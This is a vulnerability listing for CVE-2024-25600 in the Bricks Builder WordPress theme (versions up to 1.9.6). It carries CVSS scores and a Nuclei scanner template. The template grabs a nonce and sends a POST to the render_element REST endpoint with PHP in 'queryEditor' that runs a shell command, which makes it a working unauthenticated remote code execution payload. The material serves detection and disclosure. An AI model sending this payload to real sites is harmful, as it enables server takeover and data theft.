Unauthenticated Remote Code Execution – Bricks <= 1.9.6

2024-02-2102:32:04

ProjectDiscovery

github.com

cve2024

bricks

wordpress

remote code execution

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

9.9 High

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

48.2%

JSON

Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks &lt;= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities

id: CVE-2024-25600

info:
  name: Unauthenticated Remote Code Execution – Bricks <= 1.9.6
  author: christbowel
  severity: critical
  description: |
    Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks <= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600
    - https://wpscan.com/vulnerability/afea4f8c-4d45-4cc0-8eb7-6fa6748158bd/
    - https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6
    - https://github.com/Chocapikk/CVE-2024-25600
    - https://op-c.net/blog/cve-2024-25600-wordpresss-bricks-builder-rce-flaw-under-active-exploitation
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/themes/bricks/"
  tags: cve,cve2024,wpscan,wordpress,wp-plugin,wp,bricks,rce

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-json/bricks/v1/render_element HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "postId": "1",
          "nonce": "{{nonce}}",
          "element": {
            "name": "container",
            "settings": {
              "hasLoop": "true",
              "query": {
                "useQueryEditor": true,
                "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
                "objectType": "post"
              }
            }
          }
        }
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "Exception:"
          - "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
        condition: and

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - 'nonce":"([0-9a-z]+)'
        internal: true
# digest: 4a0a00473045022100a5bd80c7b1b78947e5625bc99d789dda7abab3a15d72d576e5e041a07373107702200f34940f17f5cb59266839d45826cad4832c7a1cb63955dd87d2ae154c68c50e:922c64590222798bb761d5b6d8e72950